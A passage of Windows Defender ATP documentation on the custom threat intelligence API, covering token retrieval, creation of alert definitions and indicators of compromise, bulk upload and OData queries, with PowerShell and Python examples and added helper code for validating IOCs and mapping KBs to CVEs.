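KB_ID_RE = re.compile(r"^KB(?P<kb>\d+) \((?P<build>[\d.]+)\) (?P<arch>\w+)$")

# Constructed sample: shape of GET /testwdatppreview/kbinfo (rows 2 and 3 invented)
KBINFO_RESPONSE = {
    "value": [
        {"id": "KB3097617 (10240.16549) Amd64", "release": "KB3097617 (10240.16549)",
         "publishingDate": "2015-10-16T21:00:00Z", "version": "10.0.10240.16549", "architecture": "Amd64"},
        {"id": "KB3097617 (10240.16549) X86", "release": "KB3097617 (10240.16549)",
         "publishingDate": "2015-10-16T21:00:00Z", "version": "10.0.10240.16549", "architecture": "X86"},
        {"id": "KB4000001 (10240.99999) Amd64", "release": "KB4000001 (10240.99999)",
         "publishingDate": "2016-01-01T00:00:00Z", "version": "10.0.10240.99999", "architecture": "Amd64"},
    ]
}

# Constructed sample: shape of GET /testwdatppreview/cvekbmap (rows 2 and 3 invented)
CVEKBMAP_RESPONSE = {
    "value": [
        {"cveKbId": "CVE-2015-2482-3097617", "cveId": "CVE-2015-2482", "kbId": "3097617",
         "title": "Cumulative Security Update for Internet Explorer", "severity": "Critical"},
        {"cveKbId": "CVE-2015-9999-3097617", "cveId": "CVE-2015-9999", "kbId": "3097617",
         "title": "Cumulative Security Update for Internet Explorer", "severity": "Important"},
        {"cveKbId": "CVE-2016-0001-4000001", "cveId": "CVE-2016-0001", "kbId": "4000001",
         "title": "Security Update for Windows", "severity": "Moderate"},
    ]
}


def parse_kb_id(kb_id):
    """Split 'KB3097617 (10240.16549) Amd64' into (kb number, build, architecture)."""
    m = KB_ID_RE.match(kb_id)
    if not m:
        raise ValueError(f"unexpected KB id format: {kb_id!r}")
    return m.group("kb"), m.group("build"), m.group("arch")


def cves_by_kb(cvekbmap):
    """Index the CVE-KB map as {kb number: [(cveId, severity), ...]}."""
    index = defaultdict(list)
    for row in cvekbmap["value"]:
        index[row["kbId"]].append((row["cveId"], row["severity"]))
    return dict(index)


def kbs_fixing_severity(kbinfo, cvekbmap, severities, architecture=None):
    """KB numbers (sorted, distinct across builds) that address a CVE of the given severities.

    architecture, when given, keeps only KBs published for that platform.
    """
    index = cves_by_kb(cvekbmap)
    wanted = set(severities)
    result = set()
    for entry in kbinfo["value"]:
        kb, _build, arch = parse_kb_id(entry["id"])
        if architecture and arch != architecture:
            continue
        if any(sev in wanted for _cve, sev in index.get(kb, [])):
            result.add(kb)
    return sorted(result)


def cves_for_kb(kb, cvekbmap):
    """List the CVE IDs a single KB addresses, e.g. for a patch ticket."""
    return sorted(cve for cve, _sev in cves_by_kb(cvekbmap).get(kb, []))


if __name__ == "__main__":
    print(kbs_fixing_severity(KBINFO_RESPONSE, CVEKBMAP_RESPONSE, {"Critical"}))
    print(kbs_fixing_severity(KBINFO_RESPONSE, CVEKBMAP_RESPONSE, {"Moderate"}, architecture="X86"))
    print(cves_for_kb("3097617", CVEKBMAP_RESPONSE))
```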
Enable the custom threat intelligence API in Windows
Defender ATP
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Before you can create custom threat intelligence (TI) using REST API, you'll need to set up the custom threat
intelligence application through Windows Defender Security Center.
1. In the navigation pane, select Settings > Threat intel.

2. Select Enable threat intel API. This activates the Azure Active Directory application setup sections
with pre-populated values.
3. Copy the individual values or select Save details to file to download a file that contains all the values.
WARNING
The client secret is only displayed once. Make sure you keep a copy of it in a safe place.
For more information about getting a new secret see, Learn how to get a new secret.

4. Select Generate tokens to get an access and refresh token.


You’ll need to use the access token in the Authorization header when doing REST API calls.

Related topics
Understand threat intelligence concepts
Create custom alerts using the threat intelligence API
PowerShell code examples for the custom threat intelligence API
Python code examples for the custom threat intelligence API
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
Use the threat intelligence API to create custom alerts
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Understand threat intelligence concepts, then enable the custom threat intelligence application so that you can
proceed to create custom threat intelligence alerts that are specific to your organization.
You can use the code examples to guide you in creating calls to the custom threat intelligence API.

In this section
TOPIC DESCRIPTION

Understand threat intelligence concepts: Understand the concepts around threat intelligence so that you can effectively create custom intelligence for your organization.

Enable the custom threat intelligence application: Set up the custom threat intelligence application through Windows Defender Security Center so that you can create custom threat intelligence (TI) using the REST API.

Create custom threat intelligence alerts: Create custom threat intelligence alerts so that you can generate specific alerts that are applicable to your organization.

PowerShell code examples: Use the PowerShell code examples to guide you in using the custom threat intelligence API.

Python code examples: Use the Python code examples to guide you in using the custom threat intelligence API.

Experiment with custom threat intelligence alerts: This article demonstrates an end-to-end usage of the threat intelligence API to get you started.

Troubleshoot custom threat intelligence issues: Learn how to address possible issues you might encounter while using the threat intelligence API.
Create custom alerts using the threat intelligence (TI)
application program interface (API)
4/5/2019 • 8 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

You can define custom alert definitions and indicators of compromise (IOC) using the threat intelligence API. Creating custom threat intelligence alerts allows you to generate specific alerts that are applicable to your organization.

Before you begin

Before creating custom alerts, you'll need to enable the threat intelligence application in Azure Active Directory and generate access tokens. For more information, see Enable the custom threat intelligence application.
Use the threat intelligence REST API to create custom threat intelligence alerts
You can call and specify the resource URLs using one of the following operations to access and manipulate a
threat intelligence resource:
GET
POST
PATCH
PUT (used for managing entities relations only)
DELETE
All threat intelligence API requests use the following basic URL pattern:

https://TI.SecurityCenter.Windows.com/{version}/{resource}?[query_parameters]

For this URL:

https://TI.SecurityCenter.Windows.com is the threat intelligence API endpoint.
{version} is the target service version. Currently, the only supported version is v1.0.
{resource} is the resource segment or path, such as:
AlertDefinitions (for a specific single resource, add: (id))
IndicatorsOfCompromise (for a specific single resource, add: (id))
[query_parameters] represents additional query parameters such as $filter and $select.

Quotas
Each tenant has a quota that limits the number of alert definitions and IOCs, and a separate quota for IOCs whose detection function is something other than Equals (StartWith, EndWith or Contains). If you upload data beyond a quota, you'll get an HTTP error status code 507 (Insufficient Storage). Because a bulk upload is atomic, a single batch that crosses a quota fails as a whole.

Request an access token from the token issuing endpoint

Windows Defender ATP Threat Intelligence API uses OAuth 2.0. In the context of Windows Defender ATP, the alert definitions are a protected resource. To issue tokens for ad-hoc, non-automatic operations you can use the Settings page and click the Generate Token button. However, if you'd like to create an automated client, you need to use the "Client Credentials Grant" flow. For more information, see the OAuth 2.0 authorization framework.
For more information about the authorization flow, see OAuth 2.0 authorization flow.
Make an HTTP POST request to the token issuing endpoint with the following parameters, replacing <ClientId>, <ClientSecret>, and <AuthorizationServerUrl> with your app's client ID, client secret and authorization server URL.

NOTE
The authorization server URL is https://login.windows.net/<AADTenantID>/oauth2/token . Replace <AADTenantID>
with your Azure Active Directory tenant ID.

NOTE
The <ClientId> , <ClientSecret> , and the <AuthorizationServerUrl> are all provided to you when enabling the
custom threat intelligence application. For more information, see Enable the custom threat intelligence application.

POST <AuthorizationServerUrl> HTTP/1.1


Content-Type: application/x-www-form-urlencoded

grant_type=client_credentials
&client_id=<ClientId>
&client_secret=<ClientSecret>
&resource=https://graph.microsoft.com

The response will include an access token and expiry information.

{
"token_type": "Bearer",
"expires_in": "3599",
"ext_expires_in": "0",
"expires_on": "1449685363",
"not_before": "1449681463",
"resource": "https://graph.microsoft.com",
"access_token": "<token>"
}

Threat intelligence API metadata


The metadata document ($metadata) is published at the service root.
For example, you can view the service document for the v1.0 version using the following URL:

https://TI.SecurityCenter.Windows.com/v1.0/$metadata

The metadata allows you to see and understand the data model of the custom threat intelligence, including the
entity types and sets, complex types, and enums that make up the request and response packets sent to and from
the threat intelligence API.
You can use the metadata to understand the relationships between entities in the custom threat intelligence and
establish URLs that navigate between entities.
The following sections show a few basic programming pattern calls to the threat intelligence API.

Create new resource


Typically, you'd need to create an alert definition to start creating custom threat intelligence. An ID is created for
that alert definition. You can then proceed to create an indicator of compromise and associate it to the ID of the
alert definition.
Create a new alert definition

POST https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions HTTP/1.1


Authorization: Bearer <access_token>
Content-Type: application/json;

{
"Name": " The name of the alert definition. Does not appear in the portal. Max length: 100 ",
"Severity": "Low",
"InternalDescription": "Internal description for the alert definition. Does not appear in the portal. Max
length: 350",
"Title": "A short, one sentence, description of the alert definition. Max length: 120",
"UxDescription": "Max length: 500",
"RecommendedAction": "Custom text to explain what should be done in case of detection. Max length: 2000",
"Category": "Category from the metadata",
"Enabled": true
}

The following values correspond to the alert sections surfaced on Windows Defender Security Center:

HIGHLIGHTED SECTION JSON KEY NAME

1 Title

2 Severity

3 Category

4 UX description

5 Recommended Action

If successful, you should get a 201 CREATED response containing the representation of the newly created alert definition, for example:
{
"Name": "Connection to restricted company IP address",
"Severity": "Low",
"InternalDescription": "Unusual connection to restricted IP from production machine",
"Title": "Connection to restricted company IP address",
"UxDescription": "Any connection to this IP address from a production machine should be suspicious. Only special build machines should access this IP address.",
"RecommendedAction": "Isolate machine immediately and contact machine owner for awareness.",
"Category": "Trojan",
"Id": 2,
"CreatedAt": "2017-02-01T10:46:22.08Z",
"CreatedBy": "User1",
"LastModifiedAt": null,
"LastModifiedBy": null,
"Enabled": true
}

Create a new indicator of compromise

POST https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise HTTP/1.1


Authorization: Bearer <access_token>
Content-Type: application/json;

{
"Type": "SHA1",
"Value": "8311e8b377736fb93b18b15372355f3f26c4cd29",
"DetectionFunction": "Equals",
"Enabled": true,
"AlertDefinition@odata.bind": "AlertDefinitions(1)"
}

If successful, you should get a 201 CREATED response containing the representation of the newly created
indicators of compromise in the payload.
The API currently supports the following IOC types:
Sha1
Sha256
Md5
IpAddress
DomainName
And the following operators:
Equals
StartWith
EndWith
Contains

Bulk upload of alert definitions and IOCs


Bulk upload of multiple entities can be done by sending an HTTP POST request to
/{resource}/Actions.BulkUpload .
WARNING
This operation is atomic. The entire operation can either succeed or fail. If one alert definition or IOC has a malformed
property, the entire upload will fail.
If your upload exceeds the IOCs or alert definitions quota, the entire operation will fail. Consider limiting your uploads.

The request’s body should contain a single JSON object with a single field. The name of the field in the case that
the entity is alert definition is alertDefinitions and in the case of IOC is iocs . This field’s value should contain a
list of the desired entities.
For example: Sending an HTTP POST to
https://TI.SecurityCenter.Windows.com/V1.0/IndicatorsOfCompromise/Actions.BulkUpload
JSON Body:

{
"iocs": [{
"Type": "SHA1",
"Value": "b68e0b50420dbb03cb8e56a927105bf4b06f3793",
"DetectionFunction": "Equals",
"Enabled": true,
"AlertDefinition@odata.bind": "AlertDefinitions(1)"
},
{
"Type": "SHA1",
"Value": "b68e0b50420dbb03cb8e56a927105bf4b06f3793",
"DetectionFunction": "Equals",
"Enabled": true,
"AlertDefinition@odata.bind": "AlertDefinitions(1)"
}
]
}

NOTE
Max bulk size is 5000 entities
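Because Actions.BulkUpload is atomic and capped at 5000 entities, one malformed entry rejects the whole batch, and a batch that crosses the quota fails as a whole. A client should therefore validate each entity locally before sending. The following Python example is added here (it is not code from the original page) and checks alert definitions against the field limits given under Create a new alert definition and IOCs against the types and operators listed under Create a new indicator of compromise; it then drops exact duplicates (the page's own bulk sample carries the same SHA1 twice) and splits what is left into request bodies of at most 5000. The hash formats it enforces (40 hex characters for SHA1, 64 for SHA256, 32 for MD5), the High severity value and the sample IOCs are assumptions for the demo, not taken from the page.

```python
"""Pre-flight validation and batching for TI API alert definitions and IOCs.

Added example (not code from the original page). Field limits, IOC types and
detection functions are the ones the page states; hash-length checks and
the High severity are assumptions.
"""
import re

MAX_LEN = {"Name": 100, "InternalDescription": 350, "Title": 120,
           "UxDescription": 500, "RecommendedAction": 2000}
SEVERITIES = {"Low", "Medium", "High"}  # Low and Medium appear on the page; High is assumed
IOC_TYPES = {"Sha1", "Sha256", "Md5", "IpAddress", "DomainName"}
DETECTION_FUNCTIONS = {"Equals", "StartWith", "EndWith", "Contains"}
HASH_RE = {"Sha1": re.compile(r"^[0-9a-f]{40}$"),
           "Sha256": re.compile(r"^[0-9a-f]{64}$"),
           "Md5": re.compile(r"^[0-9a-f]{32}$")}
MAX_BULK = 5000


def validate_alert_definition(ad):
    """Return a list of problems (empty when the definition is acceptable)."""
    problems = []
    for field, limit in MAX_LEN.items():
        value = ad.get(field)
        if value is not None and len(value) > limit:
            problems.append(f"{field} exceeds {limit} characters")
    for required in ("Name", "Title", "Category"):
        if not ad.get(required):
            problems.append(f"{required} is required")
    if ad.get("Severity") not in SEVERITIES:
        problems.append("Severity must be one of " + ", ".join(sorted(SEVERITIES)))
    if not isinstance(ad.get("Enabled", True), bool):
        problems.append("Enabled must be a JSON boolean, not a string")
    return problems


def validate_ioc(ioc):
    """Return a list of problems for a single indicator of compromise."""
    problems = []
    # The page spells the type Sha1 in its list and SHA1 in its JSON; compare case-insensitively
    canonical = {t.lower(): t for t in IOC_TYPES}.get(str(ioc.get("Type")).lower())
    if canonical is None:
        problems.append(f"unsupported IOC type {ioc.get('Type')!r}")
    function = ioc.get("DetectionFunction")
    if function not in DETECTION_FUNCTIONS:
        problems.append(f"unsupported DetectionFunction {function!r}")
    value = str(ioc.get("Value", ""))
    if canonical in HASH_RE and function == "Equals" and not HASH_RE[canonical].match(value.lower()):
        problems.append(f"{canonical} value is not a well-formed hash")
    if not re.fullmatch(r"AlertDefinitions\(\d+\)", str(ioc.get("AlertDefinition@odata.bind", ""))):
        problems.append("AlertDefinition@odata.bind must look like AlertDefinitions(<id>)")
    if not isinstance(ioc.get("Enabled", True), bool):
        problems.append("Enabled must be a JSON boolean, not a string")
    return problems


def prepare_bulk_ioc_bodies(iocs):
    """Validate, de-duplicate and chunk IOCs into Actions.BulkUpload request bodies.

    Returns (bodies, rejected): bodies is a list of {"iocs": [...]} dicts of at
    most MAX_BULK entries; rejected maps the index of each bad IOC to its
    problems. Duplicates (same type, value, function and binding) are dropped.
    """
    rejected, seen, accepted = {}, set(), []
    for i, ioc in enumerate(iocs):
        problems = validate_ioc(ioc)
        if problems:
            rejected[i] = problems
            continue
        key = (ioc["Type"].lower(), str(ioc["Value"]).lower(),
               ioc["DetectionFunction"], ioc["AlertDefinition@odata.bind"])
        if key in seen:
            continue
        seen.add(key)
        accepted.append(ioc)
    bodies = [{"iocs": accepted[i:i + MAX_BULK]} for i in range(0, len(accepted), MAX_BULK)]
    return bodies, rejected


# Constructed sample input: a duplicate, a malformed hash, and a string-typed Enabled
SAMPLE_IOCS = [
    {"Type": "SHA1", "Value": "b68e0b50420dbb03cb8e56a927105bf4b06f3793", "DetectionFunction": "Equals",
     "Enabled": True, "AlertDefinition@odata.bind": "AlertDefinitions(1)"},
    {"Type": "SHA1", "Value": "b68e0b50420dbb03cb8e56a927105bf4b06f3793", "DetectionFunction": "Equals",
     "Enabled": True, "AlertDefinition@odata.bind": "AlertDefinitions(1)"},
    {"Type": "Sha1", "Value": "not-a-hash", "DetectionFunction": "Equals",
     "Enabled": True, "AlertDefinition@odata.bind": "AlertDefinitions(1)"},
    {"Type": "DomainName", "Value": "evil.example", "DetectionFunction": "EndWith",
     "Enabled": "true", "AlertDefinition@odata.bind": "AlertDefinitions(1)"},
]

if __name__ == "__main__":
    bodies, rejected = prepare_bulk_ioc_bodies(SAMPLE_IOCS)
    print(len(bodies), "request body(ies);", sum(len(b["iocs"]) for b in bodies), "IOCs accepted")
    print(rejected)
```

Each body in the returned list is what goes into one POST to IndicatorsOfCompromise/Actions.BulkUpload; the rejected map is what to show the analyst instead of letting the service fail the whole batch.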

Read existing data


Get a specific resource

GET https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise(1) HTTP/1.1


Authorization: Bearer <access_token>
Accept: application/json;odata.metadata=none

If successful, you should get a 200 OK response containing a single indicator of compromise representation (for the specified ID) in the payload, as shown as follows:
HTTP/1.1 200 OK
Content-Type: application/json;odata.metadata=none

{
"value": [{
"Type": "SHA1",
"Value": "abcdeabcde1212121212abcdeabcde1212121212",
"DetectionFunction": "Equals",
"ExpiresAt": null,
"Id": 1,
"CreatedAt": "2016-12-05T15:51:02Z",
"CreatedBy": "user2@Company1.contoso.com",
"LastModifiedAt": null,
"LastModifiedBy": null,
"Enabled": true
}]
}

Get the entire collection of entities of a given resource

GET https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions HTTP/1.1


Authorization: Bearer <access_token>

If successful, you should get a 200 OK response containing the collection of alert definitions representation in the payload, as shown as follows:
HTTP/1.1 200 OK
Content-Type: application/json;odata.metadata=none

{
"@odata.context": "https://TI.SecurityCenter.Windows.com/V1.0/$metadata#AlertDefinitions",
"value": [{
"Name": "Demo alert definition",
"Severity": "Medium",
"InternalDescription": "Some description",
"Title": "Demo short ux description",
"UxDescription": "Demo ux description",
"RecommendedAction": "Actions",
"Category": "Malware",
"Id": 1,
"CreatedAt": "2016-12-05T15:50:53Z",
"CreatedBy": "user@Company1.contoso.com",
"LastModifiedAt": null,
"LastModifiedBy": null,
"Enabled": true
},
{
"Name": "Demo alert definition 2",
"Severity": "Low",
"InternalDescription": "Some description",
"Title": "Demo short ux description2",
"UxDescription": "Demo ux description2",
"RecommendedAction": null,
"Category": "Malware",
"Id": 2,
"CreatedAt": "2016-12-06T13:30:00Z",
"CreatedBy": "user2@Company1.contoso.com",
"LastModifiedAt": null,
"LastModifiedBy": null,
"Enabled": true
}
]
}

Update an existing resource


You can use the same pattern for both full and partial updates.

PATCH https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions(2) HTTP/1.1


Authorization: Bearer <access_token>
Content-Type: application/json;
Accept: application/json;odata.metadata=none

{
"Category": "Backdoor",
"Enabled": false
}

If successful, you should get a 200 OK response containing the updated alert definition representation (per the
specified ID ) in the payload.

Update the association (relation) between an indicator of compromise and a different alert definition

PUT https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise(3)/AlertDefinition/$ref HTTP/1.1
Authorization: Bearer <access_token>
Content-Type: application/json;

{
"@odata.id": "https://TI.SecurityCenter.Windows.com/v1.0/AlertDefinitions(6)"
}

Delete a resource
DELETE https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise(1) HTTP/1.1
Authorization: Bearer <access_token>

If successful, you should get a 204 NO CONTENT response.

NOTE
Deleting an alert definition also deletes its corresponding IOCs.
Deleting an IOC or an alert definition will not delete or hide past alerts matching the alert definition. However, deleting
an alert definition and creating a new one with the exact same metadata will result in new alerts in the portal. It's not
advised to delete an alert definition and create a new one with the same content.

Delete all
You can send the HTTP DELETE method to the collection resource itself to delete all of its entities.

DELETE https://TI.SecurityCenter.Windows.com/v1.0/IndicatorsOfCompromise HTTP/1.1


Authorization : Bearer <access_token>

If successful, you should get a 204 NO CONTENT response.

Delete all IOCs connected to a given alert definition


This action will delete all the IOCs associated with a given alert definition without deleting the alert definition
itself.
For example, deleting all of the IOCs associated with the alert definition with ID 1 deletes all those IOCs without
deleting the alert definition itself.
Send an HTTP POST to https://TI.SecurityCenter.Windows.com/V1.0/AlertDefinitions(1)/Actions.DeleteIOCs .
Upon a successful request the response will be HTTP 204.

NOTE
As with all OData actions, this action is sending an HTTP POST request not DELETE.

Windows Defender ATP optional query parameters

The Windows Defender ATP threat intelligence API provides several optional query parameters that you can use to specify and control the amount of data returned in a response. The threat intelligence API supports the following query options:
NAME VALUE DESCRIPTION

$select string Comma-separated list of properties to include in the response.

$expand string Comma-separated list of relationships to expand and include in the response.

$orderby string Comma-separated list of properties that are used to sort the order of items in the response collection.

$filter string Filters the response based on a set of criteria.

$top int The number of items to return in a result set.

$skip int The number of items to skip in a result set.

$count boolean A collection and the number of items in the collection.

These parameters are compatible with the OData V4 query language.

Code examples
The following articles provide detailed code examples that demonstrate how to use the custom threat intelligence
API in several programming languages:
PowerShell code examples
Python code examples

Related topics
Understand threat intelligence concepts
Enable the custom threat intelligence API in Windows Defender ATP
PowerShell code examples for the custom threat intelligence API
Python code examples for the custom threat intelligence API
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
PowerShell code examples for the custom threat
intelligence API
4/22/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
This article provides PowerShell code examples for using the custom threat intelligence API.
These code examples demonstrate the following tasks:
Obtain an Azure AD access token
Create headers
Create calls to the custom threat intelligence API
Create a new alert definition
Create a new indicator of compromise

Step 1: Obtain an Azure AD access token

The following example demonstrates how to obtain an Azure AD access token that you can use to call methods in the custom threat intelligence API. After you obtain a token, you have 60 minutes to use this token in calls to the custom threat intelligence API before the token expires. After the token expires, you can generate a new token.
Replace the authUrl, clientId, and clientSecret values with the ones you got from the Settings page in the portal. Keep the client secret out of scripts that are checked into source control:

$authUrl = 'Your Authorization URL'
$clientId = 'Your Client ID'
$clientSecret = 'Your Client Secret'

# Client credentials grant: the app authenticates as itself, no user sign-in is involved
$tokenPayload = @{
"resource"='https://graph.windows.net'
"client_id" = $clientId
"client_secret" = $clientSecret
"grant_type"='client_credentials'}

$response = Invoke-RestMethod $authUrl -Method Post -Body $tokenPayload

$token = $response.access_token

Step 2: Create headers used for the requests with the API
Use the following code to create the headers used for the requests with the API:

$headers = @{
"Content-Type"="application/json"
"Accept"="application/json"
"Authorization"="Bearer {0}" -f $token }

$apiBaseUrl = "https://ti.securitycenter.windows.com/V1.0/"

Step 3: Create calls to the custom threat intelligence API


After creating the headers, you can now create calls to the API. The following example demonstrates how you can
view all the alert definition entities:

$alertDefinitions =
(Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) -Method Get -Headers $headers).value

The response is empty on initial use of the API.

Step 4: Create a new alert definition

The following example demonstrates how to create a new alert definition. Enabled is passed as the PowerShell boolean $true so that ConvertTo-Json emits the JSON boolean true that the API expects, rather than the quoted string "true".

$alertDefinitionPayload = @{
"Name"= "The alert's name"
"Severity"= "Low"
"InternalDescription"= "An internal description of the Alert"
"Title"= "The Title"
"UxDescription"= "Description of the alerts"
"RecommendedAction"= "The alert's recommended action"
"Category"= "Trojan"
"Enabled"= $true}

$alertDefinition =
Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) `
-Method Post -Headers $headers -Body ($alertDefinitionPayload | ConvertTo-Json)

Step 5: Create a new indicator of compromise

You can now use the Id returned when the alert definition was created to create a new indicator of compromise and bind it to that definition.

# The created alert definition is returned in the response; its Id is what the IOC binds to
$alertDefinitionId = $alertDefinition.Id

$iocPayload = @{
"Type"="Sha1"
"Value"="dead1111eeaabbccddeeaabbccddee11ffffffff"
"DetectionFunction"="Equals"
"Enabled"=$true
"AlertDefinition@odata.bind"="AlertDefinitions({0})" -f $alertDefinitionId }

$ioc =
Invoke-RestMethod ("{0}IndicatorsOfCompromise" -f $apiBaseUrl) `
-Method Post -Headers $headers -Body ($iocPayload | ConvertTo-Json)

Complete code
You can use the complete code to create calls to the API.
$authUrl = 'Your Authorization URL'
$clientId = 'Your Client ID'
$clientSecret = 'Your Client Secret'

# Step 1: client credentials grant
$tokenPayload = @{
"resource"='https://graph.windows.net'
"client_id" = $clientId
"client_secret" = $clientSecret
"grant_type"='client_credentials'}

$response = Invoke-RestMethod $authUrl -Method Post -Body $tokenPayload

$token = $response.access_token

# Step 2: headers reused by every call
$headers = @{
"Content-Type"="application/json"
"Accept"="application/json"
"Authorization"="Bearer {0}" -f $token }

$apiBaseUrl = "https://ti.securitycenter.windows.com/V1.0/"

# Step 3: list existing alert definitions (empty on first use)
$alertDefinitions =
(Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) -Method Get -Headers $headers).value

# Step 4: create an alert definition; $true becomes the JSON boolean true
$alertDefinitionPayload = @{
"Name"= "The alert's name"
"Severity"= "Low"
"InternalDescription"= "An internal description of the Alert"
"Title"= "The Title"
"UxDescription"= "Description of the alerts"
"RecommendedAction"= "The alert's recommended action"
"Category"= "Trojan"
"Enabled"= $true}

$alertDefinition =
Invoke-RestMethod ("{0}AlertDefinitions" -f $apiBaseUrl) `
-Method Post -Headers $headers -Body ($alertDefinitionPayload | ConvertTo-Json)

$alertDefinitionId = $alertDefinition.Id

# Step 5: bind an IOC to the new alert definition
$iocPayload = @{
"Type"="Sha1"
"Value"="dead1111eeaabbccddeeaabbccddee11ffffffff"
"DetectionFunction"="Equals"
"Enabled"=$true
"AlertDefinition@odata.bind"="AlertDefinitions({0})" -f $alertDefinitionId }

$ioc =
Invoke-RestMethod ("{0}IndicatorsOfCompromise" -f $apiBaseUrl) `
-Method Post -Headers $headers -Body ($iocPayload | ConvertTo-Json)

Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Understand threat intelligence concepts
Enable the custom threat intelligence API in Windows Defender ATP
Create custom alerts using the threat intelligence API
Python code examples for the custom threat intelligence API
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
Python code examples for the custom threat intelligence API
4/22/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Before you begin


You must install the "requests" Python library.
These code examples demonstrate the following tasks:
Obtain an Azure AD access token
Create request session object
Create calls to the custom threat intelligence API
Create a new alert definition
Create a new indicator of compromise

Step 1: Obtain an Azure AD access token


The following example demonstrates how to obtain an Azure AD access token that you can use to call methods
in the custom threat intelligence API. After you obtain a token, you have 60 minutes to use this token in calls to
the custom threat intelligence API before the token expires. After the token expires, you can generate a new
token.
Replace the auth_url, client_id, and client_secret values with the ones you got from the Settings page in the portal:

import json
import requests
from pprint import pprint

auth_url = "Your Authorization URL"
client_id = "Your Client ID"
client_secret = "Your Client Secret"

payload = {"resource": "https://graph.windows.net",
           "client_id": client_id,
           "client_secret": client_secret,
           "grant_type": "client_credentials"}

response = requests.post(auth_url, payload)
token = json.loads(response.text)["access_token"]

Step 2: Create request session object


Add HTTP headers to the session object, including the Authorization header with the token that was obtained.

with requests.Session() as session:
    session.headers = {
        'Authorization': 'Bearer {}'.format(token),
        'Content-Type': 'application/json',
        'Accept': 'application/json'}

Step 3: Create calls to the custom threat intelligence API


After adding HTTP headers to the session object, you can now create calls to the API. The following example
demonstrates how you can view all the alert definition entities:

response = session.get("https://ti.securitycenter.windows.com/V1.0/AlertDefinitions")
pprint(json.loads(response.text))

The response is empty on initial use of the API.

Step 4: Create a new alert definition


The following example demonstrates how to create a new alert definition.

alert_definition = {"Name": "The alert's name",
                    "Severity": "Low",
                    "InternalDescription": "An internal description of the alert",
                    "Title": "The Title",
                    "UxDescription": "Description of the alerts",
                    "RecommendedAction": "The alert's recommended action",
                    "Category": "Trojan",
                    "Enabled": True}

response = session.post(
    "https://ti.securitycenter.windows.com/V1.0/AlertDefinitions",
    json=alert_definition)

Step 5: Create a new indicator of compromise


You can now use the alert ID obtained from creating a new alert definition to create a new indicator of
compromise.

alert_definition_id = json.loads(response.text)["Id"]

ioc = {'Type': "Sha1",
       'Value': "dead1111eeaabbccddeeaabbccddee11ffffffff",
       'DetectionFunction': "Equals",
       'Enabled': True,
       "AlertDefinition@odata.bind": "AlertDefinitions({0})".format(alert_definition_id)}

response = session.post(
    "https://ti.securitycenter.windows.com/V1.0/IndicatorsOfCompromise",
    json=ioc)

Complete code
You can use the complete code to create calls to the API.
import json
import requests
from pprint import pprint

auth_url = "Your Authorization URL"
client_id = "Your Client ID"
client_secret = "Your Client Secret"

payload = {"resource": "https://graph.windows.net",
           "client_id": client_id,
           "client_secret": client_secret,
           "grant_type": "client_credentials"}

response = requests.post(auth_url, payload)
token = json.loads(response.text)["access_token"]

with requests.Session() as session:
    session.headers = {
        'Authorization': 'Bearer {}'.format(token),
        'Content-Type': 'application/json',
        'Accept': 'application/json'}

    response = session.get("https://ti.securitycenter.windows.com/V1.0/AlertDefinitions")
    pprint(json.loads(response.text))

    alert_definition = {"Name": "The alert's name",
                        "Severity": "Low",
                        "InternalDescription": "An internal description of the alert",
                        "Title": "The Title",
                        "UxDescription": "Description of the alerts",
                        "RecommendedAction": "The alert's recommended action",
                        "Category": "Trojan",
                        "Enabled": True}

    response = session.post(
        "https://ti.securitycenter.windows.com/V1.0/AlertDefinitions",
        json=alert_definition)

    alert_definition_id = json.loads(response.text)["Id"]

    ioc = {'Type': "Sha1",
           'Value': "dead1111eeaabbccddeeaabbccddee11ffffffff",
           'DetectionFunction': "Equals",
           'Enabled': True,
           "AlertDefinition@odata.bind": "AlertDefinitions({0})".format(alert_definition_id)}

    response = session.post(
        "https://ti.securitycenter.windows.com/V1.0/IndicatorsOfCompromise",
        json=ioc)

    pprint(json.loads(response.text))
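Helper code for the workflow in Steps 1 to 5, added here as an example and not code from the page or from Microsoft: it builds the AlertDefinitions and IndicatorsOfCompromise payloads with the field names the page uses, checks Sha1 and IpAddress indicator values before they are submitted, and caches the Azure AD token so it is renewed inside the 60-minute lifetime stated above. The validation rules, the TokenCache class and all function names are this example's own assumptions; it performs no network calls, so the returned dicts are what you would pass to session.post() as in the page's own code.

```python
"""Payload builders and a token cache for the custom threat intelligence API.

Added example; not code from the Microsoft docs page or from Microsoft. The field
names, the 'AlertDefinition@odata.bind' reference and the 60-minute token lifetime
come from the page; the validation rules, the TokenCache class and every function
name are this example's own. No network calls are made here."""
import ipaddress
import re
import time

TOKEN_LIFETIME_SECONDS = 60 * 60  # the page states a token can be used for 60 minutes
_SHA1_RE = re.compile(r"^[0-9a-fA-F]{40}$")


def validate_indicator(ioc_type, value):
    """Return a normalised indicator value or raise ValueError.

    Handles the two indicator types this documentation uses: 'Sha1' (exactly 40
    hex digits, returned lower-cased) and 'IpAddress' (a parseable address that
    is neither loopback nor unspecified, since those never match real traffic).
    """
    if ioc_type == "Sha1":
        if not isinstance(value, str) or not _SHA1_RE.match(value):
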